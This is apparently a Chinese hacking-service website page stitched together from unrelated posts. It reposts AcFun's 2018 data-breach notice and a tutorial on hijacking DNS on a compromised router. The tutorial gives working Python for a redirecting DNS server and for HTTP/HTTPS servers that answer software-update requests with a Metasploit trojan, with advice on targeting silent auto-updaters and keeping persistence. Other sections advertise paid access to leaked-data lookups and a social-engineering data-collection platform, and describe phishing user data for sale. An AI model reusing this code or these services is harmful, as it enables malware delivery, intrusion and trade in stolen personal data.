acfun数据泄漏千万,中国骇客云平台提示您注意自己的密码安全,赶紧修改密码!

6月13日消息,今日视频弹幕网站AcFun发布公告称,AcFun受黑客攻击,近千万条用户数据外泄,建议用户尽快修改密码,目前已经搜集了相关证据并报警处理。目前本平台,第三方国外应用只可查询部份的信息。信息收集为第三方!国外网站。

以下是公告全文:更多关注中国骇客云,匿名中国官网

尊敬的AcFun用户:

我们非常抱歉,AcFun受黑客攻击,近千万条用户数据外泄。

如果您在2017年7月7日之后一直未登录过AcFun,密码加密强度不是最高级别,账号存在一定的安全风险,恳请尽快修改密码。如果您在其他网站使用同一密码,也请及时修改。

AcFun在2017年7月7日升级改造了用户账号系统,如果您在此之后有过登录行为,账户会自动升级使用强加密算法策略,密码是安全的。但是如果您的密码过于简单,也建议修改密码。

这次重大事故,根本原因还在于我们没有把AcFun做得足够安全。为此,我们要诚恳地向您道歉。

接下来,我们会采取一切必要的措施,保障用户的数据安全。我们的措施包括但不限于:

1、强烈建议账号安全存在隐患的用户尽快修改密码。我们会通过AcFun站内公告、微博、微信、短信、QQ群、贴吧等途径提醒这部分用户,也请大家相互转告。对于未及时主动修改密码的存在隐患的账户,将会在重新登录访问时,被要求修改密码。

2、事发之后,我们第一时间联合内部和外部的技术专家成立了安全专项组,排查问题并升级了系统安全等级。

3、接下来,我们会对AcFun服务做全面系统加固,实现技术架构和安全体系的升级。

4、我们已经搜集了相关证据并报警。

后续,我们会与用户、媒体和各界保持信息的及时沟通。

最后,我们再次向您诚恳地道歉。未来我们要用实际行动把A站的安全能力建设好,真正让用户放心。

AcFun弹幕视频网

2018年6月13日

用户特别提示

1、泄露的用户数据包括哪些?

包含用户ID、用户昵称、加密存储的密码等信息。

2、用户被泄露的密码是明文密码还是经过加密的?

AcFun的所有用户密码都经过加密,没有明文密码。

3、2017年7月7日之后登录过AcFun的用户,需要修改密码吗?

这部分用户的密码自动升级为更强的加密策略,密码是安全的。但是如果您的密码过于简单,也建议修改密码。

4、2017年7月7日之后没有登录过AcFun的用户,该怎么办?

建议用户尽快修改密码,如果用户在其他网站使用同一密码,也请及时修改。AcFun会采取技术措施,这部分用户的账户在重新登录访问时,会被要求修改密码。

如果您有进一步的问题,请发送至report@acfun.cn反馈。对于给您带来的困扰和不便,再次抱歉!

中国骇客云平台国际聊天室最新公告说明。

drscord程序上线了。

国外聊天室工具,可以通过苹果安卓以及pc端进行登录,也可以网页登录。

如果您已经注册以上软件程序,点击主页面,申请加入骇客云的聊天室交流。

邀请链接在主页。

另外官网客服已经转入国际客服使用Drscord聊天工具进行交流。

另外授权业务以及其他业务不受影响。

如果您预留您的微信号,或者邮箱。我们的官网客服会加您好友。感谢。

中国骇客云平台教您劫持DNS通过流量植入木马实验

 

更多可以关注我们官网:因为国内老域名已经被屏蔽现在国内域名可以正常访问:www.anonymouschina.org  www.anonymouschina.com
国际站或者国外服务器可以正常访问:www.hackerschina.org
前言

很多时候对目标进行渗透时一般会从web、网络设备、针对性钓鱼这三个方向入手。假设我们控制了目标网络中的一台网络设备,如路由器,内网用户流量会从这个地方经过我们怎么获取其权限呢 ?

这种时候可以在路由器上抓包分析用户流量,比如启动xshell、notepad++等软件时发送的更新请求包,然后我们替换软件更新的http响应包达到植入木马目的。

分析流量一般用tcpdump,如果只有路由器后台权限没有地方可以执行命令的话可以用DNS服务器配合HTTP代理来截获流量。

这里就演示一下去劫持软件更新服务器达到植入木马的目的

一、部署DNS服务器

为了方便演示这里将受害者机器上的DNS改为攻击者IP

下载sqlmap项目提取sqlmap\sqlmap-stable\lib\request目录中的dns.py

执行看看效果

在用户机器上ping了一下,DNS服务器这边已经成功接收域名解析请求并响应127.0.0.1

但是这个脚本中把所有域名解析请求都响应成127.0.0.1

需要修改一下

我们的需求是能够正常解析域名,再对某些指定域名进行劫持。

修改后代码如下

#!/usr/bin/env python"""Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)See the file 'doc/COPYING' for copying permission"""import osimport reimport socketimport threadingimport timeimport dns.resolverclass DNSQuery(object):    """    Used for making fake DNS resolution responses based on received    raw request    Reference(s):http://code.activestate.com/recipes/491264-mini-fake-dns-server/https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py    """    def __init__(self, raw):        self._raw = raw        self._query = ""        type_ = (ord(raw[2]) >> 3) & 15                 # Opcode bits        if type_ == 0:                                  # Standard query            i = 12            j = ord(raw[i])            while j != 0:                self._query += raw[i + 1:i + j + 1] + '.'                i = i + j + 1                j = ord(raw[i])    def response(self, resolution):        """        Crafts raw DNS resolution response packet        """        retVal = ""        if self._query:            retVal += self._raw[:2]                                             # Transaction ID            retVal += "\x85\x80"                                                # Flags (Standard query response, No error)            retVal += self._raw[4:6] + self._raw[4:6] + "\x00\x00\x00\x00"      # Questions and Answers Counts            retVal += self._raw[12:(12 + self._raw[12:].find("\x00") + 5)]      # Original Domain Name Query            retVal += "\xc0\x0c"                                                # Pointer to domain name            retVal += "\x00\x01"                                                # Type A            retVal += "\x00\x01"                                                # Class IN            retVal += "\x00\x00\x00\x20"                                        # TTL (32 seconds)            retVal += "\x00\x04"                                                # Data length            retVal += "".join(chr(int(_)) for _ in resolution.split('.'))       # 4 bytes of IP        return retValclass DNSServer(object):    def __init__(self):        self.my_resolver = dns.resolver.Resolver()        self.my_resolver.nameservers = ['8.8.8.8']        self._check_localhost()        self._requests = []        self._lock = threading.Lock()        try:            self._socket = socket._orig_socket(socket.AF_INET, socket.SOCK_DGRAM)        except AttributeError:            self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)        self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)        self._socket.bind(("", 53))        self._running = False        self._initialized = False    def _check_localhost(self):        response = ""        try:            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)            s.connect(("", 53))            s.send("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000".decode("hex"))  # A www.google.com            response = s.recv(512)        except:            pass        finally:            if response and "google" in response:                raise socket.error("another DNS service already running on *:53")    def pop(self, prefix=None, suffix=None):        """        Returns received DNS resolution request (if any) that has given        prefix/suffix combination (e.g. prefix.<query result>.suffix.domain)        """        retVal = None        with self._lock:            for _ in self._requests:                if prefix is None and suffix is None or re.search("%s\..+\.%s" % (prefix, suffix), _, re.I):                    retVal = _                    self._requests.remove(_)                    break        return retVal    def get_domain_A(self,domain):        try:            results=self.my_resolver.query(domain,'A')            for i in results.response.answer:                for j in i.items:                    try:                        ip_address = j.address                        if re.match('\d+\.+\d+\.+\d+\.+\d', ip_address):                            return ip_address                    except AttributeError as e:                        continue        except Exception as e:            return '127.0.0.1'                def run(self):        """        Runs a DNSServer instance as a daemon thread (killed by program exit)        """        def _():            try:                self._running = True                self._initialized = True                while True:                    data, addr = self._socket.recvfrom(1024)                    _ = DNSQuery(data)                    domain=_._query[:-1] ###### exploit                    ip=self.get_domain_A(domain)                    if domain=='cdn.netsarang.net':                        ip='192.168.80.142'                    print domain,' -> ',ip                    self._socket.sendto(_.response(ip), addr)                    with self._lock:                        self._requests.append(_._query)            except KeyboardInterrupt:                raise            finally:                self._running = False        thread = threading.Thread(target=_)        thread.daemon = True        thread.start()if __name__ == "__main__":    server = None    try:        server = DNSServer()        server.run()        while not server._initialized:            time.sleep(0.1)        while server._running:            while True:                _ = server.pop()                if _ is None:                    break                else:                    domian=_[:-1]                    #print "[i] %s with A %s" % (domian,server.get_domain_A(domian))            time.sleep(1)    except socket.error, ex:        if 'Permission' in str(ex):            print "[x] Please run with sudo/Administrator privileges"        else:            raise    except KeyboardInterrupt:        os._exit(0)    finally:        if server:            server._running = False

这个脚本的功能是将用户的DNS请求转发给GOOGLE的DNS服务器使用户能够正常上网,然后再对指定域名做劫持

可以看到现在用户已经可以正常上网了

然后部署HTTP代理服务器

代码我已经写好了

# -*- coding: UTF-8 -*-import socketimport threading, getopt, sys, stringimport re#设置默认的最大连接数和端口号list=50port=80file_contents=open('myrat.exe','rb').read()def req_server():    return 'HTTP/1.1 200 OK\r\nContent-Length: 303641\r\nContent-Type: application/force-download\r\nLast-Modified: Fri, 10 Jan 2014 03:54:35 GMT\r\nAccept-Ranges: bytes\r\nETag: "80f5adb7dcf1:474"\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\nDate: Thu, 24 May 2018 06:25:45 GMT\r\nConnection: close\r\n\r\n'+file_contents    def jonnyS(client, address):    try:    #设置超时时间        client.settimeout(500)    #接收数据的大小        buf = client.recv(2048)        print buf    #将接收到的信息原样的返回到客户端中        client.send(req_server())    #超时后显示退出    except socket.timeout:        print 'time out'    #关闭与客户端的连接    client.close()def main():    #创建socket对象。调用socket构造函数    #AF_INET为ip地址族,SOCK_STREAM为流套接字    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    #将socket绑定到指定地址,第一个参数为ip地址,第二个参数为端口号    sock.bind(('0.0.0.0', port))    #设置最多连接数量    sock.listen(list)    while True:    #服务器套接字通过socket的accept方法等待客户请求一个连接        client, address = sock.accept()        thread = threading.Thread(target=jonnyS, args=(client, address))        thread.start()if __name__ == '__main__':    main()

这里的功能是收到用户的HTTP请求后直接响应一个二进制文件,也就是我们的木马

效果如下

很多软件更新时都走的https所以我们还需搭建https代理服务器

搭建HTTPS代理服务器

代码如下

import socketserver, ssl, timeclass MyHTTPSHandler_socket(socketserver.BaseRequestHandler):    def handle(self):        context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)        context.load_cert_chain(certfile="cert.pem")        SSLSocket = context.wrap_socket(self.request, server_side=True)        self.data = SSLSocket.recv(1024)        print(self.data)        file_contents=open('myrat.exe','rb').read()        buf = 'HTTP/1.1 200 OK\r\nContent-Length: 303641\r\nContent-Type: application/force-download\r\nLast-Modified: Fri, 10 Jan 2014 03:54:35 GMT\r\nAccept-Ranges: bytes\r\nETag: "80f5adb7dcf1:474"\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\nDate: Thu, 24 May 2018 06:25:45 GMT\r\nConnection: close\r\n\r\n'+file_contents        SSLSocket.send(buf)if __name__ == "__main__":    port = 443    httpd = socketserver.TCPServer(('0.0.0.0', port), MyHTTPSHandler_socket)    httpd.serve_forever()

执行openssl req -new -x509 -keyout https_svr_key.pem -out https_svr_key.pem -days 3650 -nodes  可以生成证书

搭建好后配置木马,这里就用msf做演示

msfvenom -p windows/ -f exe -o myrat.exe

然后看一下xshell的更新请求

域名是cdn.netsarang.net,看一下流量

可以看到是走的https

在dns服务器中添加如下

架设https服务器

运行脚本和msf监听

视频效果图

总结

1.可以针对firefox等自动更新或后台静默更新的这类应用程序进行流量替换,这样成功率会很高被发现可能性也小

2.当更新包请求是https时需要注意证书问题,可以尝试利用cname绕过,比如在dns服务器上把www.baidu.com重定向到www.exploit.com,我们有www.exploit.com的合法证书这样就不会报错.

3.在路由器上修改DNS也可以作为一种持久性控制的手段,某天权限不慎丢失了,继续植入就行了。

*本文原创作者:R1ngk3y,本文属FreeBuf原创奖励计划,未经许可禁止转载

2018.5.26日应用库更新通知以及更改相关接口通告!

首先中国骇客云是一个以网络安全为己任的小网站,在这里感谢这么多会员一直以来的支持!我们做到最好!
本次更新了应用库若干个不能正常打开的应用和增加国外代理接口的网站程序(可以下载)
本次更新通知:泄漏库是国外的,可以正常查看部分的已xielou数据,当然只能登陆去应用库里面然后注册查看(范围只供给国际和国内部分数据资源)我们用的接口接的不要问我们xielou了什么样的数据自己去看吧!
增加chinese – girl视频接口网站(自己去研究一下吧)
增加IP国际代理和VPN可以国外访问,稳定性测试过还可以,官网应用库直接可以找到的。
修正IP定位接口。
增加全网高清免费VIP在线影院(所有网上花钱的电影电视剧均可以在本应用库里面去免费观看)
原骇客云视频演示应用已经移除!
更多更新请参考本站公告感谢支持!
本站在国内访问并不是非常稳定,希望广大用户使用国际站进行登录!感谢支持!
【重要通知一下:1元免费试用会员功能在2015年已经下架,如果您确定资助我们可以扫描二维码支付】
官网授权现在全部转入第三方授权(该功能的上线使会员们更可靠的进行交易了)有第三方平台的担保!审核不通过您的资金会通过支付路径转回到您的账户,请您放心使用小程序支付二维码。
另外所有授权的会员会通过邮件的方式给您发账户信息,如果在正常的收件箱里没有找到官网的邮件,请在垃圾箱里面去看下。
感谢支持!!!

中国骇客云平台官网授权业务指南以及软件购买须知!

中国骇客云平台网站集全球以及中国地区web骇客程序为云集平台!
官网原老域名为:www.hackerschina.org现在只能通过翻墙来登录。
如果国内登录请访问域名:www.anonymouschina.org 或者www.anonymouschina.com www.xi0.site这几个域名都可以正常访问。
关于本站授权,全功能授权二维码小程序:


如果有其他疑问您也可以直接填写以下表单至我们后台!
您扫描以上二维码预留信息以后我们会通过您的邮箱发送登录的授权账户信息,请注意查收。如果在您的邮件中没有收到信息我们会给您发送两条信息,可以通过查看垃圾箱的方式进行查看我们给您发送的账户信息。
如果没有请填写您的反馈,输入以下我们客服会在后台中查看并在第一时间与您联系。
注:扫描该二维码时请给我们的微信收款接口写明您的微信账号!方便我们客服添加您为好友。
以下表单请预留您的手机号,微信号,邮箱,即可完成授权,直接在授权二维码预留手机号,微信号,邮箱也是可以的!感谢支持!


扫描该程序二维码支付费用即可完成授权,查看获取的账号可以通过您当时预留的邮箱可以正常的看到官网的登录连接地址账户信息等。
如果有疑问请发送至邮箱:hkyunxss@163.com 这个邮箱,我们的客服看到后会第一时间加您为好友,如果其他得业务请点击连接:【点我进入
官网软件购买需知:
因为本软件为中国骇客云工具云集软件程序exe程序,如果您需要该软件,扫描二维码授权成为会员发送至邮箱:gh0stkylin@163.com
记得要给我们留您得微信号,客服才能加上您!gh0stkylin@163.com

中国骇客云平台业务说明(业务公告指南)

本站业务包括:建站,域名托管解析服务,服务器托管运维,SEO优化推广,广告推广,关键字词推广服务!
建站包括:虚拟主机,服务器。
域名为全平台托管服务,任何一家的域名服务商,我们可以做域名抢注与解析服务,虚拟主机出售。服务器出售。

虚拟主机价格:

继续阅读“中国骇客云平台业务说明(业务公告指南)”

中国骇客云平台官方网站2018.5.18国内地区不能正常访问公告!

尊敬得用户大家好:
因本站国际域名www.hackerschina.org被墙,导致不能在中国地区正常访问!我们在最快得时间进行了域名得重置。现在国内地区可以访问得域名为:www.xi0.site 国内主站域名为:www.anonymouschina.org
另外原域名www.hackerschina.org云平台进入地址为:复制www.hackerschina.org/hackeryun (数据库搜索需要在国外进行,不能翻墙查询,服务器已经全面恢复,或者挂vpn都不行,国内违规,只要国内访问都是违规内)。
另外其他域名正在被注册局进行认证处理,新上线得话会通知!
目前,我们要对本站进行国内网站优化(对于国内得一些关键字词进行优化,不再更新黑产教程,只更新网络安全文章)云平台用户不受影响,但是如果使用某工具需要联系本站官网客服。(云平台数据库搜索下架,但是如果使用翻墙还是可以在线支付的,因为涉及国际用户,该功能不做移除!)
云平台其他国内功能以及国外功能,可以正常使用,具体参考官方网站后续公告!

中国骇客云平台教你揭秘微信支付存在的一些安全漏洞,之前官网上面有介绍,今天另介绍一种方法提醒网民。

首先这里介绍一种微信的支付安全尝试算是一些支付的一种安全策略漏洞。|
以前官网介绍的是一种二维码直接支付免密支付一种安全漏洞,那么今天官方网站介绍一种更为牛逼的支付免密支付、
教程开始:
首先打开微信,点击+号,点击收付款,点击第一行条形码,点击上面灰色文字显示:“点击可查看付款码数字”而支付胡付款码数字一旦被泄露给黑客或者是有心人,将会造成财产损失。
这里本站测试了 中国石化加油 使用该付款码进行支付,那么这些付款均存在以上的安全支付问题,容易造成付款码泄露。
微信厂商做了实时更新付款码,但是以上安全漏洞还是可以被利用。
条形码就是把付款码存储在条形码中使用机器扫描支付,如果条形码或者以上支付二维码,支付付款码被泄露,那么就会造成用户的财产损失。
这里就不上图了……
更多请关注本站官方网站。

官方网站公告(项目“公告栏目”更新通告,授权更新通告,以及会员信息采集平台通告,官网域名新增公告)

尊敬的用户大家好!
             本次更新将公告内容移动至  RECENT ARTICLES  栏目,阅读方式:请下拉骇客云平台官方网站至页底!查看最新公告或者使用右下角的搜索功能查看公告~
             新增官方网站会员自助授权通道,可直接向我们发起支付留言,客服审核不通过,所有交易资金会反至您交易账户中,对您的资金不受任何影响。审核通过的账户均下发账户信息至您的微信号当中,两种方式反馈给您,微信账户信息反馈,以及邮箱反馈,您注意查收。
              会员信息采集平台是中国骇客云平台针对会员进行数据分析的一个平台,用于社会工程学~(它是正规平台)请不要把我们当作黑客!具体二维码扫描官方网站是有二维码,直接微信扫描即可完成,记得一定要添加记录哟。
             官方网站域名新增:http://www.anonymouschina.com/   匿名中国!感谢大家一直以来的支持!请记住我们的永久域名:www.hackerschina.org  www.anonymouschina.com    
感谢大家一直以来的支持!

黑产之数据交易,钓鱼用户信息解密!(更多关于灰色产业请关注我们的网站hackerschina.org)

尊敬的用户每周我们更新一期黑产的解密,这些教程也是为了让更多的人关注网络,关注网络安全,关注自己的隐私信息不被泄漏!
但中国是个网络信息泄漏大国!数据安全从我们自身做起!
教程开始:
首先一些“商家”利用用户拼团进行钓鱼。
比如一件衣服300元,a用户拼团进行推荐用户,b用户,c用户进行拼团,细胞分列式….拼团成功。a用户可以0元得到一件商品。b,c,用户的信息已经泄漏给商家。另外b.c用户也进行拼团,其他所有用户数据信息泄漏都会受到波及!商家可收集这些用户的信息。
把这些信息卖给 黑客!当然….这些数据绝对比300元的商品多的多..你们会了吗?
以上介绍了商家进行钓鱼。
我们介绍一下自己搭建平台进行钓鱼,做一些问卷类型的调查报告!有趣的!再后头就可以截获到用户的信息。
手机局域网的中间人攻击也可以实现对目标用户信息窃取!
还有一种方法!扫描二维码.白送杯子啊…充电宝啊..用户上当受骗的肯定多的多!
另外公众微信平台也可以通过某些小程序对所有用户进行信息窃取。
包括app在获取用户时,可对用户通讯录进行权限获取…万能钥匙就是很好的例子~~可以百度以下咯…(关于万能钥匙不做过多解释,百度一大堆…具体情况本人也不知道…想了解更多用户信息窃取..百度一下吧..方法多的是!!)
最主要的一步来了、。。。
找到收数据的人..这些数据可以卖到..多少钱..是个惊天价格!
另外公司内部员工…弟弟外卖..以及其他也是数据信息泄漏的途径..
这些get 你们知道了吗?
以后自己的信息还安全吗……~~~~~